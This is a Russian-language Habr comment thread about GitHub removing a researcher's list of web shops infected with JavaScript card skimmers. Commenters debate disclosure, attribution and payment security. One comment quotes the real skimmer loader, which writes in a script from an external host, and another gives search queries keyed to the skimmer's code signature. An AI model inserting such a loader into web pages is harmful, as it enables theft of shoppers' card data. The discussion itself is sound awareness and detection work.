Хабр Курсы для всех
РЕКЛАМА
Практикум, Хекслет, SkyPro, авторские курсы — собрали всех и попросили скидки. Осталось выбрать!
Хабр доступен 24/7 благодаря поддержке друзей
Комментарии 86
По мнению администрации, публикация списка уязвимых магазинов рассматривается как «вопиющий случай», который не может быть разрешён.
А я вот удаление рассматриваю как вопиющий случай)
Иски за утерянную репутацию будет гитхаб ловить, а не ноунейм-юзеры. Реакция гитхаба понятна.
Да это-то понятно. Просто, в мире как-то оригинальная ситуация складывается — конторы начинают чесаться только после того как косяк получит огласку. Складывается ощущение, что сообщать косяк напрямую администрации подавляющего большинства фирм даже смысла не имеет — столько уже случаев было, когда проходили месяцы и ничего не изменялось. А потом вдруг оказывается «утерянная репутация».
А список этот можно опубликовать в соцсети, он потом растащится по ней, а затем по инету — и поди лови его везде… Лучше бы убрали косяки, заткнули дыры и отписались бы, что, мол, была проблема, признаём, работы проведены, спасибо сообществу большое… Репутацию надо восстанавливать, а не стараться сразу информацию убрать везде, где руки дотянутся — вообще везде не дотянутся)
А список этот можно опубликовать в соцсети, он потом растащится по ней, а затем по инету — и поди лови его везде… Лучше бы убрали косяки, заткнули дыры и отписались бы, что, мол, была проблема, признаём, работы проведены, спасибо сообществу большое… Репутацию надо восстанавливать, а не стараться сразу информацию убрать везде, где руки дотянутся — вообще везде не дотянутся)
лично для меня репутация гигабайт уже утеряна. так как получается что они на стороне мошенников.
и в заголовке статьи можно прямо так и писать, «Github на стороне мошенников» или
«Github помогает мошенникам с банковскими картами, скрывает информацию о интернет-магазинах с установленными JS-скиммерами»
и в заголовке статьи можно прямо так и писать, «Github на стороне мошенников» или
«Github помогает мошенникам с банковскими картами, скрывает информацию о интернет-магазинах с установленными JS-скиммерами»
Да! Гитхаб же им вирусов на сайты по насовал!
Иски за утерянную репутацию будет гитхаб ловить, а не ноунейм-юзеры. Реакция гитхаба понятна.
Я понимаю если бы опубликовали сайты в которых есть уязвимость, знание которой может навредить.
Но, опубликован список сайтов, которыми надо прекратить пользоваться, ввиду ошибки из за которой сам пользователь и пострадает.
И о какой репутации идет речь, когда на лицо финансовая безопасность?
Это все равно, что не говорить людям о пожаре внутри магазина, а то потом придется за репутацию магазина отвечать, пусть лучше люди горят?
>> Подобную закладку довольно трудно обнаружить на сервере.
нет, вовсе не трудно:
<реклама>
https://publicwww.com/websites/%22querySelectorAll%28%5C%22input%2C+select%2C+textarea%2C+checkbox%22/
https://publicwww.com/js/%22querySelectorAll%28%5C%22input%2C+select%2C+textarea%2C+checkbox%22/
</реклама>
и да, код мутирует, домены для отстука тоже.
нет, вовсе не трудно:
<реклама>
https://publicwww.com/websites/%22querySelectorAll%28%5C%22input%2C+select%2C+textarea%2C+checkbox%22/
https://publicwww.com/js/%22querySelectorAll%28%5C%22input%2C+select%2C+textarea%2C+checkbox%22/
</реклама>
и да, код мутирует, домены для отстука тоже.
Автор передал список магазинов со скиммерами в Google для помещения в чёрный список Chrome Safe Browsing.Сайты все еще доступны.
>>Этим занимаются не какие-то скрипт-кидди, а хорошие профессионалы. Вероятно — из России.
Это какой то новомодный тренд захвативший медиапространство, если где то, кого то хакнули обязательно укажи на след из России, разумеется без доказательств.
Это какой то новомодный тренд захвативший медиапространство, если где то, кого то хакнули обязательно укажи на след из России, разумеется без доказательств.
Русская мафия отошла на второй план, теперь её затмевают русские хакеры.
Помоему отличный тренд.
Вот представьте, какая-нибудь крупная зарубежная IT-компания планирует нанять разработчиков на новый проект, в котором надо большое внимание уделить безопасности. Соответственно, с хорошей оплатой. Вот они и думают:
— А где нам найти таких хороших разрабов?
— Как где, в России, там же полно хакеров.
Так пассивно поднимается ваша конкурентноспособность.
:)
Вот представьте, какая-нибудь крупная зарубежная IT-компания планирует нанять разработчиков на новый проект, в котором надо большое внимание уделить безопасности. Соответственно, с хорошей оплатой. Вот они и думают:
— А где нам найти таких хороших разрабов?
— Как где, в России, там же полно хакеров.
Так пассивно поднимается ваша конкурентноспособность.
:)
Лишь бы без дополнений в виде отношения как к бывшим/действующим преступникам.
Почему же сразу поднимается?
Что им мешает размышлять иным образом, к примеру:
— Хм, к нам пытается устроиться разраб из России на проект с безопасностью, возьмем?
— Ты что, там в России уйма хакеров, еще потом сам на нас атаку и организует.
Что им мешает размышлять иным образом, к примеру:
— Хм, к нам пытается устроиться разраб из России на проект с безопасностью, возьмем?
— Ты что, там в России уйма хакеров, еще потом сам на нас атаку и организует.
Автор исследования ездит на УАЗ 3741, так что, возможно, пассаж про Россию это некий <сарказм>
Учитывая описанную в статье первоначальную реакцию магазинов на уязвимость, удивительно что кто-то из них вобще мог обратиться к Github с требованием удалить список.
А если предположить, что магазины не торопятся реагировать, потому что сами в сговоре? Может у хакеров своеобразная партнерка работает? «Поставь скрипт в магазин и получи 30% наворованного — обутый пользователь все равно ничего не поймет и не докажет». Вроде той схемы, что работает между «поставщиками платного контента» и опсосами.
В списке 44 домена в зоне .ru
Есть какие-нибудь интересные домены в списке риска?
Можно просто номера строки из pastebin в целях конспирации ;)
Есть какие-нибудь интересные домены в списке риска?
Можно просто номера строки из pastebin в целях конспирации ;)
grep '.*.ru'
Некоторые российские могут быть с ком-доменом, но ничего знакомого с .ru не увидел.
Может представители GitLab прокомментируют ситуацию?
В Gitlab извинились и восстановили список
Стоит добавить в какую-нибудь из подписок [ad|u]block'a.
Атака типа «внедрение кода CMS», что это? «Реальный код зловреда» по прежнему обфусцирован, неужели это не очевидно даже для редактора GT? И это ладно ещё сайты взламывают, владельцу сайта ещё как то можно защититься, а ведь ещё бывает что в популярных расширениях для браузера встраивают подобный код, и он добавляется на все сайты, которые заинтересуют злоумышленников.
Прочел в заголовке «скример» и очень удивился, пока не перечитал
— Сейчас посмотрел сайты с доменом .ru — более сотни уже
Быстро пробежался поиском по списку — подделок известных магазинов и площадок не нашел
— Сейчас посмотрел сайты с доменом .ru — более сотни уже
Быстро пробежался поиском по списку — подделок известных магазинов и площадок не нашел
я вот одного не понял — как можно перехватывать данные кредиток, если например paypal перебрасывает на другой сайт для оплаты?
Мало того, чтобы тебе на домене разрешили пользоваться визой или мастеркард необходимо пройти нехилую сертификацию набезопасность в т.ч.
В большинстве случаев если сайт хочет подключить платежи — он идет к платежным системам у которых уже есть необходимые сертификаты или к конкретному банку, и тот дает свой готовый редирект на свою страничку (правда некоторые делают iframe, 'поубивавбы')
единственный метод скримера — это 'проксирование' запросов к банку на вебсервере (была недавно статья с примером такой атаки)
В большинстве случаев если сайт хочет подключить платежи — он идет к платежным системам у которых уже есть необходимые сертификаты или к конкретному банку, и тот дает свой готовый редирект на свою страничку (правда некоторые делают iframe, 'поубивавбы')
единственный метод скримера — это 'проксирование' запросов к банку на вебсервере (была недавно статья с примером такой атаки)
Через форму оплаты внутри шопа.
В списке есть сайты, на которых отсутствует функционал оплаты картой. Я бы предположил, что это профилактические меры, но как минимум у двух таких сайтов нужного функционала никогда не было. Выходит, ложно-положительные срабатывания?
Специалисты считают, что большое количество заражённых серверов указывает на высокую степень автоматизации атаки.
Для внедрения закладок используются уязвимости в программном обеспечении интернет-магазинов. В первую очередь, это уязвимое программное обеспечение Magento Commerce.
Таски на понедельник:
- Получить (найти, купить, нагуглить) уязвимость популярных CMS (Magento Commerce например)
- Обкатать на локалке скрипт эксплуатации уязвимости с последующим внедрением скиммера
- Добавить список сайтов на популярных CMS, отправить рабов со скриптом.
- ...
- Profit
В списке зараженные сайты, а не магазины
В списке вообще есть демка какой-то модификации Magento. Очевидно, что код встраивается автоматически через какую-то уязвимость или через спираченные плагины\шаблоны (ныне популярная тема впихивать в них всякую хрень, а потом распространять через варезники).
Это стандартная практика, особенно для России. Я имею ввиду, тупость просто космического уровня. Потому жулики и живут припеваюче
>>Специалисты считают, что большое количество заражённых серверов указывает на высокую степень автоматизации атаки. Этим занимаются не какие-то скрипт-кидди, а хорошие профессионалы. Вероятно — из России.
«У пальто плохой фасон — значит шил его масон.» (с)
В смысле, что немного умиляет смотреть, как столь простая манипуляция общественным мнением неизменно находит отклик у просвещённой общественности. Всего-то и надо — в течении довольно непродолжительного времени последовательно употреблять заветную фразу «наверное, это были хакеры из России» применительно ко всем комментируемым инцидентам в области компьютерной безопасности (причём какие-либо доказательства совершенно не обязательны), чтобы эта присказка стала дежурной и автоматически вставлялась в статьи множеством независимых авторов (опять же, без каких-либо доказательств).
И вот, profit — миллионы читателей живут со вбитым в мозги клише про всеобщую вину «хакеров из России». Понятное дело, что эти хакеры все сплошь в ushanka, а в свободное время пьют vodka и смотрят как их домашний медведь пляшет под balalayka.
«У пальто плохой фасон — значит шил его масон.» (с)
В смысле, что немного умиляет смотреть, как столь простая манипуляция общественным мнением неизменно находит отклик у просвещённой общественности. Всего-то и надо — в течении довольно непродолжительного времени последовательно употреблять заветную фразу «наверное, это были хакеры из России» применительно ко всем комментируемым инцидентам в области компьютерной безопасности (причём какие-либо доказательства совершенно не обязательны), чтобы эта присказка стала дежурной и автоматически вставлялась в статьи множеством независимых авторов (опять же, без каких-либо доказательств).
И вот, profit — миллионы читателей живут со вбитым в мозги клише про всеобщую вину «хакеров из России». Понятное дело, что эти хакеры все сплошь в ushanka, а в свободное время пьют vodka и смотрят как их домашний медведь пляшет под balalayka.
Вчера автор переместил результаты исследования безопасности интернет-магазинов на хостинг Gitlab. Сегодня страница по этому адресу возвращает ошибку 404. Несколько часов назад автор получил письмо от Gitlab, в котором объясняют причины удаления. По мнению администрации, публикация списка уязвимых магазинов рассматривается как «вопиющий случай», который не может быть разрешён. Поэтому список был удалён.
Восстановили уже: https://about.gitlab.com/2016/10/15/gitlab-reinstates-list-of-servers-that-have-malware/
But in this case the victim of the vulnerability is not only the owner but also the users of the web store. The owners of web stores have a responsibility to their users. And it is in the users interest to have the list published so owners fix their stores. We currently think that the interest of the user weights heavier. Therefore we reinstated the snippet.
Изначально решили, что публикация списка дырявых сайтов — не круто, потом подумали хорошенько, и решили что потенциальный вред пользователям от уже заражённых сайтов перевешивает вред от публикации списка дырявых сайтов.
Обновите текст статьи =).
Реальный код зловреда слишком зловещь! На самом деле за ним скрывается вот это:
window.document.write("<script type="text/javascript" src="http://ip.5uu8.com/ip/ip_4079.js"></script>")
IMHO — вся эта борьба со скримерами, это сражение с ветряными мельницами. Пока будут способы увести деньги с карточки — будут уводить, а «в дураках» — всегда окажутся покупатели.
Нужно чтобы карточка «намертво» привязывалась к номеру телефона, и никаких способов снять деньги без подтверждения через смс — не было в принципе. А то сейчас если клиент сам платит — у него каждый раз код запросят. А как данные украдут — вдруг оказывается, что можно и без кода как-то снять. Вот этого я никак не пойму. Если кому-то нужно без кода — сделайте галочку в договоре (по умолчанию выключенную), о том что клиент берет на себя всю ответственность, но хочет то-то и то-то…
Проблема в том, что банкам и мобильным операторам которые допускают возможность кражи — по большому счету плевать на ситуацию, ведь добивается возврата далеко не каждый. Если бы обязали банки возвращать сворованное в 10 кратном размере (если списание произошло без реального подтверждения по смс или присутствия пользователя, например, на кассе). И если бы причины кражи с мобильным оператором выяснял банк, а не пользователь — уверен, что резко нашлись бы решения кардинально улучшить ситуацию.
Нужно чтобы карточка «намертво» привязывалась к номеру телефона, и никаких способов снять деньги без подтверждения через смс — не было в принципе. А то сейчас если клиент сам платит — у него каждый раз код запросят. А как данные украдут — вдруг оказывается, что можно и без кода как-то снять. Вот этого я никак не пойму. Если кому-то нужно без кода — сделайте галочку в договоре (по умолчанию выключенную), о том что клиент берет на себя всю ответственность, но хочет то-то и то-то…
Проблема в том, что банкам и мобильным операторам которые допускают возможность кражи — по большому счету плевать на ситуацию, ведь добивается возврата далеко не каждый. Если бы обязали банки возвращать сворованное в 10 кратном размере (если списание произошло без реального подтверждения по смс или присутствия пользователя, например, на кассе). И если бы причины кражи с мобильным оператором выяснял банк, а не пользователь — уверен, что резко нашлись бы решения кардинально улучшить ситуацию.
Телефон столь ненадёжная вещь, на котором живут вирусы, СИМ которого перевыпускается в любом офисе оператора безо всяких документов- спасибо, не нужно.
Суть моего замечания как раз в том что такая ситуация сохраняется ровно пока всем кто может на нее повлиять — плевать. Были бы от краж большие проблемы у банков и мобильных операторов — и ситуации с «СИМ перевыпускается в любом офисе оператора безо всяких документов» — внезапно пропали бы.
Навскидку могу предложить несколько решений которые сильно сократят такие ситуации, но которые не вводят из экономии средств.
К слову, когда хотел перевыпустить свою симку, без документов меня даже слушать не стали.
На счет вирусов — утверждения безосновательны. На современном смартфоне чтобы словить вирус который сможет читать/отправлять смс — нужно очень постараться. Были тут статьи на эту тему.
А кому нужна карточка для оплаты в интернете без амазона?
1. Мне нужна. В инете покупал многое, но конкретно на амазоне — ни разу.
2. Кому сильно нужно — можно написать в банке заявление, или для амазона можно завести yandex-карту и кидать на нее ровно те суммы которые нужны.
Деньги обычно уводят с зарплатных карт, а на них защита 3D Secure, активированная по умолчанию — была бы очень кстати. Люди чаще всего даже не догадываются, что с их карты можно снять деньги без ввода кода, потому, что сами вводили его при каждом платеже.
3. Уверен, что амазон бы решил проблему и добавил поддержку 3D Secure. Также как и другие поставщики. Было бы желание.
3dsecure и есть «галочка», только находится она у мерчанта (магазина то бишь): мерчант включил 3dsecure — усложнил себе процесс оплаты и потерял часть клиентов, которые смс не дождались/находятся в другой стране/роуминге etc. Выключил 3dsecure — получил больше клиентов, но готовься возвращать деньги по мошенническим транзакциям. Видимо у амазона дополнительный доход с лихвой покрывает расходы на фрод. А деньги по транзакциям без 3dsecure банк возвращают в 100% случаев, правда процесс это длительный.
Вирусы на телефоне? Сам себе злобный буратино. Не качай всякую хрень абы откуда. Купи нокию-фонарик без явы и держи в ящике стола, только совершать любые платные операции с него не забывай — звонок или смска раз в месяц самое то. А то купят симку, привяжут карту и забывают, а потом по условиям пункта договора о неиспользовании номера в течение 3 месяцев его отбирают и подключают кому-то другому с «подарком» в виде привязанной твоей банковской карты.
Замена симки без паспорта — ответственность на девочках, сидящих в офисе опсоса. По правилам они должны требовать паспорт или доверенность установленного образца от владельца номера. Не раз менял симки (маме красно-яйцевую по случаю утопления телефона, себе старую на новую от зеленого с поддержкой 4G) — везде требовали паспорт.
Замена симки без паспорта — ответственность на девочках, сидящих в офисе опсоса. По правилам они должны требовать паспорт или доверенность установленного образца от владельца номера. Не раз менял симки (маме красно-яйцевую по случаю утопления телефона, себе старую на новую от зеленого с поддержкой 4G) — везде требовали паспорт.
вообще, как бы нет проблемы запрещать интернет покупки в интернет-банкинге.
например газпромбанка и тинькова это возможно(не рекламирую, просто другими не пользовался)
У ГПБ в их приложении можно даже выставить в каких странах можно делать интернет покупки,, а в каких нет. Но я обычно просто запрещаю все, так как карточка уже много где засветилась.
например газпромбанка и тинькова это возможно(не рекламирую, просто другими не пользовался)
У ГПБ в их приложении можно даже выставить в каких странах можно делать интернет покупки,, а в каких нет. Но я обычно просто запрещаю все, так как карточка уже много где засветилась.
> подтверждения через смс
Это абсолютно бесполезная и небезопасная фигня, перевыпустить симку легко и на смартфон тоже может попасть вирус. Да еще и можно на 3 мес улететь в отпуск и оператор дропнет контракт, а номер уйдет в продажу заново. Следующий обладатель номера может быть приятно удивлен бонусом в виде денег на счете.
Что действительно нужно, так это подтверждение платежа через приложение (как ENUM у Webmoney). Правда груз в виде обратной совместимости с мерчантами, которые не поддерживают 3d secure всю идею убивает на корню.
Это абсолютно бесполезная и небезопасная фигня, перевыпустить симку легко и на смартфон тоже может попасть вирус. Да еще и можно на 3 мес улететь в отпуск и оператор дропнет контракт, а номер уйдет в продажу заново. Следующий обладатель номера может быть приятно удивлен бонусом в виде денег на счете.
Что действительно нужно, так это подтверждение платежа через приложение (как ENUM у Webmoney). Правда груз в виде обратной совместимости с мерчантами, которые не поддерживают 3d secure всю идею убивает на корню.
>> Нужно чтобы карточка «намертво» привязывалась к номеру телефона
нужно идти дальше — чтобы номер телефона намертво привязвался к телефону (затрояненому вхлам), а то доставать эти «безопасные» СМС сложновато
нужно идти дальше — чтобы номер телефона намертво привязвался к телефону (затрояненому вхлам), а то доставать эти «безопасные» СМС сложновато
Что-то не пойму, как зловредный js на domain.ru может украсть данные карточки, которые вводятся в платёжном шлюзе (money.yandex.ru, payonline, robokassa и др.). Магазинов, которые «внутри» своей cms предлагали бы ввести данные карты, я не встречал. Максимум — стоит iframe от того же агрегатора, в который js попасть не может.
Зона RU сравнительно молода, потому в большинстве российским магазинов все так. Но я многократно помогал небольшим интернет-магазинам из США и Европы править мелкие баги на сайте или внедрять что-то новенькое и был поражен обилием древнего кода, статичных страниц и применения технологий десятилетней давности.
Тут несколько вариантов:
1. Сайт действительно разрабатывался более 10 лет назад, когда платежных шлюзов было меньшинство, эквайринг предоставлялся местным банком, а о технологии 3D secure еще не слышали. Владелец такого магазина предпочитает НИЧЕГО не трогать, пока оно работает, а проблемы решать симптоматично.
2. Сайт разрабатывался «по учебнику», при чем, очень старому. На полном серьезе, есть такие энтузиасты. Недавно меня просили помочь исправить ошибку на сайте. На вопрос, почему все так странно написано получил ответ, что это прямая перепечатка из учебника (древний бумажный o'relly).
3. Владельцы сайтов могут не доверять «всем этим шлюзам и пейпалам», а предпочитают локальный эквайринг. Деньги поступают быстрее и нет лишних «заморозок» или необъяснимых отзывов. Кто работал с приемом платежей, знают, какой процент закладывается на фрод.
Тут несколько вариантов:
1. Сайт действительно разрабатывался более 10 лет назад, когда платежных шлюзов было меньшинство, эквайринг предоставлялся местным банком, а о технологии 3D secure еще не слышали. Владелец такого магазина предпочитает НИЧЕГО не трогать, пока оно работает, а проблемы решать симптоматично.
2. Сайт разрабатывался «по учебнику», при чем, очень старому. На полном серьезе, есть такие энтузиасты. Недавно меня просили помочь исправить ошибку на сайте. На вопрос, почему все так странно написано получил ответ, что это прямая перепечатка из учебника (древний бумажный o'relly).
3. Владельцы сайтов могут не доверять «всем этим шлюзам и пейпалам», а предпочитают локальный эквайринг. Деньги поступают быстрее и нет лишних «заморозок» или необъяснимых отзывов. Кто работал с приемом платежей, знают, какой процент закладывается на фрод.
Зависит от типа товара. Колеблется от 5 до 30% при отключенном 3DS. Для цифровых товаров с простой схемой перепродажи (фотостоки, биржи тем для сайтов и т.д.) может достигать 90%. Диспуты стоят денег и очень редко заканчиваются в пользу продавца (не забываем про взнос за создание диспута), поэтому чаще всего платеж полностью рефандится.
При включенном 3DS проблема частично остается, так как до сих пор многие банки покупателей не считают его обязательным и по каким-то своим критериям подтверждают транзакцию без подтверждения. У других коды для 3DS предгенерированные или генерируются по простому принципу, а то и вообще просто пароль — такие перехватываются теми же JS-скиммерами или троянами вместе с данными карты.
Но такие дела (включен 3DS, подтверждение от банка покупателя) продавцу гораздо проще «выиграть», особенно если доказать, что отмена со стороны продавца технически невозможна или повлечет существенные потери.
Включать или не включать 3DS зависит от вас. Для сервисов, ориентированных на туристов, например, обязательное включение 3DS может отсечь часть покупателей, которым в данный момент недоступен «домашний» номер телефона, или служба безопасности банка которых страдает паранойей, отягощенной слабоумием.
Так что если у вас локальный бизнес с лагом исполнения (вроде доставки цветов или бетонные гробы на заказ), или long-time услуга (онлайн-курсы с сопровождением или подписка на трансляции — фактические затраты близки нулю, а отмена возможна в любой момент), то для вас возможно проще и дешевле воспользоваться эквайрингом местного банка, при этом не усложняя процесс покупки.
При включенном 3DS проблема частично остается, так как до сих пор многие банки покупателей не считают его обязательным и по каким-то своим критериям подтверждают транзакцию без подтверждения. У других коды для 3DS предгенерированные или генерируются по простому принципу, а то и вообще просто пароль — такие перехватываются теми же JS-скиммерами или троянами вместе с данными карты.
Но такие дела (включен 3DS, подтверждение от банка покупателя) продавцу гораздо проще «выиграть», особенно если доказать, что отмена со стороны продавца технически невозможна или повлечет существенные потери.
Включать или не включать 3DS зависит от вас. Для сервисов, ориентированных на туристов, например, обязательное включение 3DS может отсечь часть покупателей, которым в данный момент недоступен «домашний» номер телефона, или служба безопасности банка которых страдает паранойей, отягощенной слабоумием.
Так что если у вас локальный бизнес с лагом исполнения (вроде доставки цветов или бетонные гробы на заказ), или long-time услуга (онлайн-курсы с сопровождением или подписка на трансляции — фактические затраты близки нулю, а отмена возможна в любой момент), то для вас возможно проще и дешевле воспользоваться эквайрингом местного банка, при этом не усложняя процесс покупки.
Подозреваю, что некоторые магазины не ответили, потому что с той стороны просто не говорят по-английски. Отписался по-чешски одному чешскому сайту, который достаточно популярен по сравнению с остальными чешскими сайтами в списке. Но тут есть такой момент, что люди склонны с подозрением относиться к подобным сообщениям.
А гугл переводчик у них уже отключили за неуплату?
Увы, особенность восприятия информации у многих людей такова, что если что-то на непонятном языке, то удалить не читая.
Если вам от неизвестного отправителя придет письмо на языке, который вы не знаете, вы полезете в гугл, чтобы его перевести?
Так скажем, я немного занимался вебом, и моим клиентам регулярно приходят письма на английском, бывают письма и на других языках. Так вот, письма на английском они читают почти всегда (с помощью гугл или промт переводчиков), за исключением тех людей, которые принципиально удаляют все входящие не от контактов как спам (независимо от языка письма). Потому что так уж получилось исторически, что домены, хостинги, CMS-ки, вот это все разрабатывается и оперируется, очень часто, на английском языке. Вплоть до takedown нотисов и уведомлений от поисковых систем, что опаньки, у вас тут малварь завелся. Английский язык — язык Интернет сети.
Не знаю как в других банках — в моем, при оплате чего либо через интернет, надо вводить код, который приходит на мобилу.
Данные украдут, только воспользоваться не смогут.
Данные украдут, только воспользоваться не смогут.
Проблема в том что совершив транзакцию украв у вас код (от банально ударив камнем по затылку и забрав телефон, до перевыпуска вашей симки и вирусов перехватывающих смс и подтверждающих код) вы уже не сможете вернуть деньги, не поймав преступника (что крайне маловероятно), так как ответственность лежит на вас. А банк просто поведёт плечами и скажет: «Ну не надо было подтверждать транзакцию, как бы мы не хотели, но ничем вам помочь не можем.»
Вы очень удивитесь когда купите что-либо на алиэкспрессе.
Странно, но у меня при оплате на алиэкспрессе требует код подтверждения.
С меня тоже не требовало, как, предполагаю, и с оратора выше.
Могут быть ньюансы, например суммы ниже установленного лимита проводятся без подтверждения, типа для оплаты проезда в транспорте будет не очень удобно каждый раз ждать и вводить код подтверждения.
Это зависит от банка-эмитента карты.
Это зависит от банка-эмитента карты.
Думается мне, что ~2200 (столько стоил заказ с алика) — это явно больше, чем установленный лимит, даже если он и есть. В то же время, когда оплачивал через робокассу чуть меньше 1000 рублей — там подтверждение требовало.
Кстати еще забавная фигня: у меня зарплатная виза, у мамы мастер. Банк один и тот же. Когда покупали в днсе, с меня пин требовали, а с мамы — нет.
Кстати еще забавная фигня: у меня зарплатная виза, у мамы мастер. Банк один и тот же. Когда покупали в днсе, с меня пин требовали, а с мамы — нет.
Да официальная и теневая торговля личными данными становится походу перспективным источником дохода веб проектов любого масштаба.
И уже никого не чешет правомерно или криминальным путем получены данные.
Под вопросом только кто выступает инициатором и организатором внедрения и использования уязвимых и опасных решений — веб-разработчики или кардеры.
Ну тот же самый MEGA — запускает на ваше машине в worker'e чо им вздумается, и что там они исполняют — вам не доложат.
Чо далеко ходить? Мой FF с далеко не самыми жесткими и полными параноидальными настройками не логинится на сраном гавносайте.
Мое мнение — все, даже не так, ВСЕ новые внедряемые и разрабатываемые коммерческие веб технологии изначально ориентированы на получение ваших любыхи всяких данных/сведений и ослабление того что называется информ. безопасности и приватности.
И уже никого не чешет правомерно или криминальным путем получены данные.
Под вопросом только кто выступает инициатором и организатором внедрения и использования уязвимых и опасных решений — веб-разработчики или кардеры.
Ну тот же самый MEGA — запускает на ваше машине в worker'e чо им вздумается, и что там они исполняют — вам не доложат.
Чо далеко ходить? Мой FF с далеко не самыми жесткими и полными параноидальными настройками не логинится на сраном гавносайте.
Мое мнение — все, даже не так, ВСЕ новые внедряемые и разрабатываемые коммерческие веб технологии изначально ориентированы на получение ваших любыхи всяких данных/сведений и ослабление того что называется информ. безопасности и приватности.
Приходилось разок реализовать интернет эквайринг,
мой сервер готовил данные и дальше редирект на сайт банка.
Данные карты вводятся только на сайте банка.
В таком варианте либо ломать сайт банка, либо редирект на левый сайт.
Но встречаются сайты где своя форма ввода данных карточки, либо она в отдельном фрейме.
Оплат на таких сайтах стараюсь вообще избегать либо использовать одноразовую виртуальную карту.
Кстати из фрейма тоже можно инфу выудить ява скриптами, это ограничение вводит браузер и каждый браузер по разному работает.
мой сервер готовил данные и дальше редирект на сайт банка.
Данные карты вводятся только на сайте банка.
В таком варианте либо ломать сайт банка, либо редирект на левый сайт.
Но встречаются сайты где своя форма ввода данных карточки, либо она в отдельном фрейме.
Оплат на таких сайтах стараюсь вообще избегать либо использовать одноразовую виртуальную карту.
Кстати из фрейма тоже можно инфу выудить ява скриптами, это ограничение вводит браузер и каждый браузер по разному работает.
Популярных магазинов нет. В списке не нашел ни одного которым пользовался. Кто-нибудь пользовался хоть одним магазином?
решил пройтись по списку и предложить владельцам сайта почистить сайты от вирусов, поставить последние патчи и защитить сайт, чтоб такого не повторилось. разослал примерно 50 писем. пока ответил только один. его реакция была следующая:
«приходи ко мне !@#!@#, я тебя с лестницы скину !»№!"№, заразил и теперь вымогаешь деньги."
«приходи ко мне !@#!@#, я тебя с лестницы скину !»№!"№, заразил и теперь вымогаешь деньги."
Request Policy.
Я не хочу отправлять странные запросы запросы на странные сервера и мой браузер меня слушается.
Я не хочу отправлять странные запросы запросы на странные сервера и мой браузер меня слушается.
сразу 3 магазина бонгов в зоне Ру. Совпадение?
Мне одному кажется, что это реклама?
Желтая же статья. За рубежом стараюсь платить через Paypal, в России ввод данных на стороне банка или платежной системы, как правило. Думаю масштаб реальной угрозы не такой и большой, а вот заражено большое количество уязвимых версий CMS даже если в них нечего воровать или нельзя украсть.
Зарегистрируйтесь на Хабре, чтобы оставить комментарий
Github удалил список 5925 интернет-магазинов с установленными JS-скиммерами